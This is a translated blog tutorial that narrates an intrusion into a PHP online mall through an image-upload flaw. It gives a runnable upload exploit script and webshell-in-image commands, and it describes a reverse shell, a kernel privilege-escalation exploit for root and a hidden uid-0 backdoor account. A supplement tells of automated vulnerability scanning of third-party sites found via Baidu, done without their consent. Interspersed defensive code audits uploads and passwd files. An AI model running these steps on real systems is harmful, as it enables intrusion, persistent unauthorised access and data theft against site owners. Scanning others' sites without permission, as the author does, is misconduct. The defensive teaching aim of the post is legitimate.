Hackers? Invade 100 servers within 1 hour, baidu becomes an accomplice?!

Time: 2021-8-26

Recently a friend set up an online mall and asked me to test it for him, which is how this article came about.

Background description

"A few days ago, a friend found me through QQ. He said he had found my shared "vulnerability scanning software" through a Baidu Cloud search tool, found my QQ number inside the software, and wanted me to help test his mall. At first I refused, but since he had gone to the trouble of finding me, I decided to test it for him and get a meal out of it (in order not to cause trouble for the user, I will mask the URLs that appear in this article)."

By reading this article, you will understand the whole intrusion process: how to exploit a vulnerability in the website, take over server permissions step by step, modify the server password, and steal the database.

About the title

  • What is a server?
  • What’s the use of servers?
  • What will hackers do if they invade the server?
What is a server?

A server, in plain terms, is a computer placed in a machine room. The differences from our ordinary computers are that a server has a fixed IP, a firewall, constant temperature and humidity, and so on.

The role of a server is similar to that of a USB flash drive: both store files. The server stores the website files you have built, but it is not limited to websites; it also holds pictures, text, videos, databases, website programs, and so on.

What’s the use of servers?

Servers have a wide range of uses. Online games, websites and some software need to be hosted on a server. Some enterprises also run their own servers, with important work information stored on the server's hard disk.

What will hackers do if they invade the server?
  • If they invade a server running a community access control system, they can open and close the community gate or a building's entrance door at will;
  • If they invade the server equipped with monitoring and management system, they can operate the camera at will.
  • If they invade the server with the website program or database, they can steal the website source code, modify or steal the database data
  • ……

Here, we should understand the harm of a server intrusion. If you want to learn more about vulnerabilities, you can go to the WooYun ("dark cloud") knowledge base. It holds more than 40000 valuable vulnerability reports, the hard work of the white hats. Address: http://www.anquan.us/

If you have any questions, you can send me a private message.

There is no trivial matter in the network, everything needs to be careful!

On security issues, a well-known domestic search engine gives the same kind of answers every time.

[screenshot: search results]

These materials basically tell you how to check and how to protect, treating the symptoms rather than the root causes. You don’t know the bad guys’ methods, you don’t know the bad guys’ process, and after being bullied by the bad guys you are always left in one state of mind: panic!

[picture from the Internet]

The story begins

Next, from the perspective of an “attacker”, I will tell the whole test process as a story in the first person.

Hello, I’m the hero of the story: Xiao Hei. I received a security testing job. The other party asked me to help test the security of their website. All the information I know about the website is as follows:

  • A mall
  • Written in PHP
  • Open source software
  • website

No…

Find vulnerabilities in the open source web software

First, find out whether the software on the website has any public vulnerabilities. If not, you can download the software and test it yourself, carefully screening for problems in its logic or coding.

Fortunately, I found this software on a security forum. Some time ago a picture upload vulnerability was disclosed for it.

Causes of the vulnerability:
  • No permission check is done at the background picture upload interface;
  • The suffix of the uploaded picture is not verified to be JPG, JPEG, PNG or GIF.

Consequences of the vulnerability:
  • Any user can upload pictures through the interface;
  • Script files disguised as pictures are parsed after upload.

Solution:
  • Do a permission check;
  • Check the suffix of the uploaded picture file;
  • Optionally, store uploaded files on OSS.

It’s a good start to find a way in so soon, haha.

Make a picture horse (a webshell disguised as an image)

Since this is a picture upload vulnerability, next I need to disguise a webshell as a picture, upload it, and test the customer’s website.

Warning: in order not to affect the tested website, all Trojan files used in this article are empty files.

Windows system:

copy tp.jpg/b+yjh.php  tpyjh.jpg
/**
 * tp.jpg: a normal picture
 * yjh.php: a one-sentence Trojan (webshell)
 * tpyjh.jpg: the generated one-sentence Trojan disguised as a picture
 */

Linux system:

cat tp.jpg yjh.php > tpyjh.jpg
/**
 * tp.jpg: a normal picture
 * yjh.php: a one-sentence Trojan (webshell)
 * tpyjh.jpg: the generated one-sentence Trojan disguised as a picture
 */
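As an added example (not part of the original article), here is a Python check that implements the three fixes listed for the upload interface above and rejects the picture horse just described: a permission check, a suffix whitelist, and inspection of the file content so that a picture with a PHP script appended is refused even though its suffix is .jpg. The function names, the admin flag and the sample bytes are assumptions made for the demo.

```python
# Added example (not from the original article). Implements the three fixes
# described for the picture upload interface and rejects the "picture horse"
# (image bytes with a PHP script appended). Names and sample bytes are constructed.
import os
import re
import secrets

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}

# Leading bytes a genuine file of each allowed type must start with.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# PHP open tags; if a PHP interpreter is ever tricked into parsing the file,
# whatever follows such a tag would run.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def validate_image_upload(filename, data, is_admin):
    """Return (ok, reason) for an upload to the admin picture interface."""
    # Fix 1: the interface must check permissions before accepting anything.
    if not is_admin:
        return False, "permission denied: upload interface requires admin"
    # Fix 2: whitelist the suffix. Only the final suffix counts, so
    # 'tpyjh.php' is rejected here and 'x.php.jpg' must pass the checks below.
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed: %r" % ext
    # Content checks: the bytes must look like the claimed image type and
    # must not carry an embedded PHP tag (the appended-script case).
    if not data.startswith(MAGIC[ext]):
        return False, "file header does not match a %s image" % ext
    if PHP_TAG.search(data):
        return False, "PHP open tag found inside image data"
    return True, "ok"


def safe_destination(upload_root, ext):
    """Choose the save path on the server side. The vulnerable interface took a
    client-supplied file_path; here the client has no say in location or name."""
    name = "%s.%s" % (secrets.token_hex(8), ext)
    root = os.path.realpath(upload_root)
    dest = os.path.realpath(os.path.join(root, name))
    if not dest.startswith(root + os.sep):
        raise ValueError("destination escaped the upload root")
    return dest


# Constructed samples: a minimal JPEG header, and the same bytes with a PHP
# tag appended the way the article builds its picture horse.
CLEAN_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16
POLYGLOT_JPG = CLEAN_JPG + b"<?php /* constructed placeholder, no payload */ ?>"

if __name__ == "__main__":
    for name, blob, admin in [("tp.jpg", CLEAN_JPG, True),
                              ("tpyjh.jpg", POLYGLOT_JPG, True),
                              ("tpyjh.php", b"<?php", True),
                              ("tp.jpg", CLEAN_JPG, False)]:
        print(name, admin, validate_image_upload(name, blob, admin))
    print(safe_destination("/var/www/upload", "jpg"))
```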

Write an upload script to test the vulnerability

#!/usr/bin/python
# -*- coding: utf-8 -*-
# test_upload.py

import requests
import random

url_base = '[root domain name of the website to be tested]'

def requests_post(url, data, files):
    temp = None
    headers = get_header()
    try:
        temp = requests.post(url, data=data, files=files, headers=headers, timeout=5)
    except ValueError, e:
        return False
    return temp

def get_header():
    user_agent_list = [
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95',
        'Safari/537.36 OPR/26.0.1656.60',
        'Opera/8.0 (Windows NT 5.1; U; en)',
        'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.50',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0',
        'Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 '
        '(maverick) Firefox/3.6.10',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '
        'Chrome/39.0.2171.71 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 '
        '(KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
    ]
    UserAgent = random.choice(user_agent_list)
    header = {'User-Agent': UserAgent}
    return header


if __name__ == '__main__':
    data = {
        "file_path": "upload/common/"
    }
    files = {
        "file_upload": ("tpyjh.php", open("tpyjh.php", "rb"), "image/png")
    }
    url =  url_base + 'index.php?s=/admin/upload/uploadfile'
    res = requests_post(url, data, files)
    print res.status_code
    print res.text.decode('unicode_escape')

Upload test:

[screenshot]

Upload succeeded and the Trojan path is returned: upload/common/1565530537.php

Connection test with China Chopper (the “kitchen knife” webshell client): getshell!

[screenshot]

Tip: if you want to prevent someone from maliciously uploading Trojan files through an upload vulnerability, be sure to turn off write and execute permissions on the upload directory!

Through the above operations I found that execute permission on this upload directory had not been turned off, so eight or nine times out of ten the write permission would not be restricted much either. So I casually found a high-privilege webshell (a “big horse”) on the Internet and uploaded it. The reason for uploading a big horse is that, generally speaking, a small horse has relatively few capabilities and is easy to detect and remove. A big horse with evasion applied (adding modifiers, obfuscation, splitting and other means can avoid signature-based detection) has more capabilities and can hide on the server for a long time, which makes privilege escalation convenient.

Tip: when checking for Trojans on a server, relying on keywords or signatures only catches the simple ones. If the attacker uses evasion, they are hard to find.
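As an added example (not the article's code), a Python audit of an upload directory along the lines of the tip above: it reports world-writable directories, files with an execute bit set, script files sitting under the upload path (like the upload/common/1565530537.php returned earlier), and image files carrying a PHP open tag. It builds its own sample tree in a temporary directory; the layout and file names are constructed for the demo.

```python
# Added example (not from the original article). Audits an upload directory
# for the conditions the tip above warns about. The sample tree is constructed.
import os
import shutil
import stat
import tempfile

IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif"}


def audit_upload_dir(root):
    """Return a sorted list of (relative_path, reason) findings under root."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        # Directories: anyone being able to write here defeats the upload check.
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            findings.append((rel_dir, "world-writable directory"))
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, root)
            mode = os.stat(path).st_mode
            # Nothing uploaded by users should ever be executable.
            if mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
                findings.append((rel, "execute bit set"))
            # A .php (or any non-image) file under upload/ is the classic sign
            # of the upload flaw having been used.
            ext = os.path.splitext(fn)[1].lower()
            if ext not in IMAGE_EXT:
                findings.append((rel, "non-image extension %s under upload dir" % ext))
                continue
            # Image by name, but with a PHP tag inside: the picture horse.
            with open(path, "rb") as fh:
                data = fh.read()
            if b"<?php" in data or b"<?=" in data:
                findings.append((rel, "PHP open tag inside image file"))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample: a clean image, an uploaded .php named like the path
    the vulnerable interface returned, and a picture horse with its x bit set."""
    root = tempfile.mkdtemp(prefix="upload_audit_")  # created with mode 0700
    common = os.path.join(root, "common")
    os.makedirs(common)
    os.chmod(common, 0o777)  # the bad setting: a world-writable upload dir
    jpeg_head = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 8
    with open(os.path.join(common, "tp.jpg"), "wb") as fh:
        fh.write(jpeg_head)
    with open(os.path.join(common, "1565530537.php"), "wb") as fh:
        fh.write(b"<?php /* constructed placeholder, no payload */ ?>")
    horse = os.path.join(common, "tpyjh.jpg")
    with open(horse, "wb") as fh:
        fh.write(jpeg_head + b"<?php /* constructed placeholder */ ?>")
    os.chmod(horse, 0o755)
    return root


def cleanup_sample_tree(root):
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    sample = build_sample_tree()
    try:
        for rel, reason in audit_upload_dir(sample):
            print("%-28s %s" % (rel, reason))
    finally:
        cleanup_sample_tree(sample)
```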

Upload an evasion-hardened big webshell

Upload to the server:

[screenshot: big webshell entry page]

[screenshot: big webshell management interface]

Note: about big webshells, please don’t use them casually. Of ten big webshells published online, all ten have a backdoor! This is what people call “black eats black”. If you test your server with a big webshell downloaded from the Internet, it may be used by its publisher, resulting in irreparable losses!

Reverse shell

Because the big webshell lacks many capabilities and operating it through a web page is inconvenient, a reverse shell is needed so that the target host can be operated from the command line.

For a reverse shell, a machine reachable from the outside is necessary. Even if it is not on the public network, it can be mapped through port forwarding. If it is an Internet server, it is even simpler. Because Xiao Hei has some idle test servers on hand, he connects back directly through one of them for convenience.

Listening port:

[screenshot]

There are many ways to execute the reverse shell command, and different target hosts support different ones. After testing, I chose the nc (netcat) reverse shell. Start the reverse connection ~

[screenshot]

Reverse connection succeeded!

[screenshot]

Many people may feel that at this stage they already have root permission and control the whole target host. However, it’s not that simple. Let’s see which user I currently am:

[screenshot]

In fact, you can guess it is nginx or apache without looking, because we connected through the web and the program is written in PHP. Don’t believe it? See which directory we are currently in:

[screenshot]

The initial location is the directory of the big webshell. There is no problem with that. However, during operation I found that no matter how I changed the path, it seemed to stay in the current directory. This is too inconvenient!

[screenshot]

So I changed the webshell and bounced the shell back through Python instead.

[screenshot]

Connection succeeded! And I tested the command line.

OK ~ it seems normal.

[screenshot]

View system information

First view the shadow file and the passwd file.

Tip: Xiao Hei has a habit. If he can reach the root directory of the target host, he first looks at the permissions of the shadow and passwd files, and then carries out the next operation (it turned out that permissions were insufficient, so he moved on).

[screenshot]

View kernel version:

[screenshot]

Linux 10-10-34-187 3.10.0-123.4.4.el7.x86_64 #1 SMP Fri Jul 25 05:07:12 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

Read /proc/version to get the Linux kernel version:

[screenshot]

Linux version 3.10.0-123.4.4.el7.x86_64 ([email protected]) (gcc version 4.8.2 20140120 (Red Hat 4.8.2-16) (GCC) ) #1 SMP Fri Jul 25 05:07:12 UTC 2014

Check the CentOS version:

[screenshot]

Privilege escalation with an exp (exploit)

After checking, the Linux kernel version is found to be: Linux 3.10.0-123.4.4.el7.x86_64 on CentOS

Therefore, we need to find an exp that supports this version. Introduction to exp: https://blog.csdn.net/zhao199…

After searching, a kernel exp was found that can be used to escalate to the root user.

Tip: there are many privilege escalation techniques. Here, try kernel exploitation first. If it doesn’t work, switch to another technique.

Upload the exp to the /tmp/ directory of the target host:

[screenshot]

Check:

[screenshot]

Compile the exp:

[screenshot]

Embarrassing ~ an error is reported:

gcc: error trying to exec 'cc1': execvp: No such file or directory
# No such file or directory

Input: whereis gcc
I found gcc at /usr/bin/gcc
So I tried setting the path. The command is as follows:

export PATH=/usr/bin:$PATH   (adjust according to your own location)

Continue compiling:

[screenshot]

40616.c: In function 'procselfmemThread':
40616.c:99:9: warning: passing argument 2 of 'lseek' makes integer from pointer without a cast [enabled by default]
         lseek(f,map,SEEK_SET);
         ^
In file included from 40616.c:28:0:
/usr/include/unistd.h:334:16: note: expected '__off_t' but argument is of type 'void *'
 extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW;
                ^
/tmp/ccacvdug.o: In function `main':
40616.c:(.text+0x39d): undefined reference to `pthread_create'
40616.c:(.text+0x3b8): undefined reference to `pthread_create'
40616.c:(.text+0x3d1): undefined reference to `pthread_create'
40616.c:(.text+0x3e5): undefined reference to `pthread_join'
collect2: error: ld returned 1 exit status

Another error is reported. After opening the file and looking at it, I found that the pthread library had not been linked in (the undefined references to pthread_create and pthread_join above; the -lpthread option is missing). Continue compiling:

[screenshot]

Some warnings during compilation can be ignored, as long as ls confirms that the compiled binary is there:

[screenshot]

Check our current id. At present my uid is 997, an ordinary user:

[screenshot]

Execute the exp:

[screenshot]

After the exp runs, the currently logged-in user name has changed to root. Print the id: the uid is 0, the super user. In other words, at this point I already have control of the whole server and can do whatever I want.

As an intruder, in order not to bring unnecessary impact to my next operations, the first thing to do next is to create a separate account for myself and raise it to root so that I can log in remotely. If I don’t create a separate account, I can’t connect to the server remotely; I have to come in through the reverse shell every time, and re-run the privilege escalation every time I come in. This is too troublesome and easy to discover, and would ruin the whole result of the escalation. Therefore, since we are escalating privileges, what we need to do is make it as complete as possible.

Add user

Now that I have root permission, my test is almost complete. I will demonstrate the next operation directly on my own server to avoid unnecessary trouble for the other party.

Create an account named test01 with the adduser [user name] command and set the initial password:

[screenshot]

Open the passwd file with vim /etc/passwd and find the newly created test01:

[screenshot]

Modify the uid (user ID) of test01 to 0; 0 means super user:

test01:x:1002:1002:,,,:/home/test01:/bin/bash
# Change to:
test01:x:0:1002:,,,:/home/test01:/bin/bash

Explanation of the /etc/passwd file:

test01:x:1002:1002:,,,:/home/test01:/bin/bash
# Field 1: user name
# Field 2: password flag
# Field 3: uid (user ID) (0: super user; 1 ~ 499: system users; 500 ~ 65535: ordinary users)
# Field 4: gid (the user's initial group ID)
# Field 5: user description
# Field 6: home directory (ordinary user: /home/<user name>; super user: /root/)
# Field 7: shell used after login

# What is a shell?
# 1. The shell is the command interpreter of Linux
# 2. In /etc/passwd, besides the standard shell /bin/bash, other values can be
#    written. For example, /sbin/nologin means the user cannot log in. If the
#    administrator changes a user's 7th field to /sbin/nologin, that user is
#    temporarily disabled.
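As an added example (not part of the original article), here is a Python audit of passwd-format text that flags the persistence trick just shown (a second account whose uid is 0) together with the related weak spots the field explanation points at: empty password fields, system-range accounts with a login shell, and uids shared by several names. The sample passwd content is constructed; on a real host you would pass the contents of /etc/passwd.

```python
# Added example (not from the original article). Parses /etc/passwd content
# and flags a second uid-0 account and related weak spots. Sample is constructed.
from collections import defaultdict

NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}


def audit_passwd(text):
    """Return a list of human-readable findings for passwd-format text."""
    findings = []
    names_by_uid = defaultdict(list)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            findings.append("malformed line: %r" % line)
            continue
        name, pw_flag, uid, _gid, _desc, _home, shell = fields
        uid = int(uid)
        names_by_uid[uid].append(name)
        # Field 3 == 0 is the super user; only root should carry it.
        if uid == 0 and name != "root":
            findings.append("uid 0 account other than root: %s" % name)
        # Field 2: 'x' means the hash lives in /etc/shadow; empty means no password.
        if pw_flag == "":
            findings.append("empty password field: %s" % name)
        # Field 7: system accounts (1-499 in the ranges given above) should not
        # have an interactive shell.
        if 1 <= uid <= 499 and shell not in NOLOGIN_SHELLS:
            findings.append("system account %s (uid %d) has login shell %s" % (name, uid, shell))
    for uid, names in names_by_uid.items():
        if len(names) > 1:
            findings.append("uid %d shared by: %s" % (uid, ", ".join(names)))
    return findings


# Constructed sample: normal entries plus the modified test01 line from above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
nginx:x:997:995:Nginx web server:/var/lib/nginx:/sbin/nologin
test01:x:0:1002:,,,:/home/test01:/bin/bash
"""

if __name__ == "__main__":
    # On a real host: audit_passwd(open("/etc/passwd").read())
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```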

Now that an independent account has been created and promoted to super user, log in and check that the connection succeeds:

[screenshot]

Log in successfully, and you are a super user, ojbk ~

At this point the whole privilege escalation process is complete, and super-administrator rights on the target server have finally been obtained.

However, if the purpose of the person escalating privileges is malicious, now is when they really start performing. They may modify data, steal data, destroy the server, and so on; no one can be sure of their real purpose.

For example

If the real purpose of my intrusion were to modify data, then next I would need to find the location of the database.

During the intrusion test I already learned that the other party uses an nginx server environment. Therefore, I can look for nginx’s configuration file, first understand how many web services are running on the current server, find the one we need, and locate its root directory:

[screenshot]

Check the two files with the cat command. In most cases one of them configures the corresponding domain name and website path. But the actual situation is: their contents are the same, both the default nginx.conf configuration. It is worth noting that the default server root path is then the place to look.

[screenshot]

Go to /home/wwwroot/default and look:

[screenshot]

I found the other party’s phpMyAdmin, went back up one level, and found the location of the website… Next, I can get the database connection address, database name, account and password from the website program, and so operate the database.

Next, I won’t demonstrate operations such as modifying the database. If you are a novice who doesn’t know much about database operations, you can consult me. I wrote a script for database backup:

#!/bin/bash
# Name: bakmysql.sh

# backupdir: the directory the database backup is written to
backupdir=/home/pigbak/mysqldata
# time: timestamp so that earlier backups are not overwritten
time=`date +%Y%m%d_%H%M%S`
# Database name: lucky
# Database account: root
# Database password: 123456
# Note: a password given as -p<password> on the command line is visible to other
# users in the process list; a ~/.my.cnf readable only by the backup user avoids that.

# Back up the database named lucky into $backupdir, compressed
mkdir -p "$backupdir"
mysqldump -uroot -p123456 lucky | gzip > "$backupdir/lucky_$time.sql.gz"

So far, this is the end of a brief but relatively complete intrusion demonstration (I won’t demonstrate operations such as deleting logs; after all, my main purpose is to let you understand the security risks, not to teach you how to avoid being tracked). You should know the attacker’s methods: know yourself and know the enemy, and you can win a hundred battles. I hope you can take corresponding precautions in these areas. If you don’t understand how to defend a particular step, you can consult me.

supplement

After helping my friend finish the whole intrusion test, I found a very interesting thing. Many people use this open source software platform, and what’s chilling is that many of them may already have been compromised!!! Aren’t their servers lambs to the slaughter??!!!

To test my idea, I wanted to find all the companies (or individuals) using this open source mall via Baidu and find the websites that had not been patched.

So I searched with a well-known domestic search engine:

[screenshot: search results]

It almost scared me. There were 1,400,000 results…

Even if only one in 1000 is vulnerable, the number is not small!

With such a huge amount of data, manual testing is certainly unreliable, so I wrote an automated script in Python based on Baidu’s search results. It automatically filtered out all websites unrelated to the open source software, then automatically tested for the vulnerability and recorded the results.

Create a new result folder and put three files in it:

  • successful.txt: stores the addresses of vulnerable websites together with the vulnerability path
  • fail.txt: stores the addresses of websites running the software where the vulnerability was not found
  • scanner.py: the vulnerability detection script

[screenshot]

Enter the result folder and run the script to start detection:

[screenshot]

In the end, the program checked 13 pages (20 results per page) and found 8 websites whose vulnerability had not been fixed. Then I resolutely stopped the program and did not continue, but fell into deep thought.

Page 13 test results

Websites that still have the vulnerability:

[screenshot]

Websites whose vulnerability has been fixed:

[screenshot]

At this rate, after checking all the websites, the number of vulnerable sites could easily exceed 1000. But think about it carefully: in fact any seemingly perfect program has bugs, so why are so many vulnerable websites still running normally? Six years ago, I’m afraid many of these websites or servers would have been defaced by script kiddies. In fact, it is just like thieves in our lives: with the improvement of living standards, it is not that everyone’s anti-theft technology has improved, but that everyone lives better, so thieves don’t need to do those things any more. Now a practice server costs next to nothing; there is no need to take the risk of attacking others.

Be open and aboveboard, work down-to-earth, and never violate the moral bottom line!

Well, today’s popularization of security knowledge is over.

Supplementary notes

This article is only intended to popularize network security knowledge, raise readers’ security awareness, and introduce the characteristics of common vulnerabilities. If a reader engages in any behaviour that endangers network security, they bear the consequences themselves; it has nothing to do with the platform or the original author. It is hereby declared.
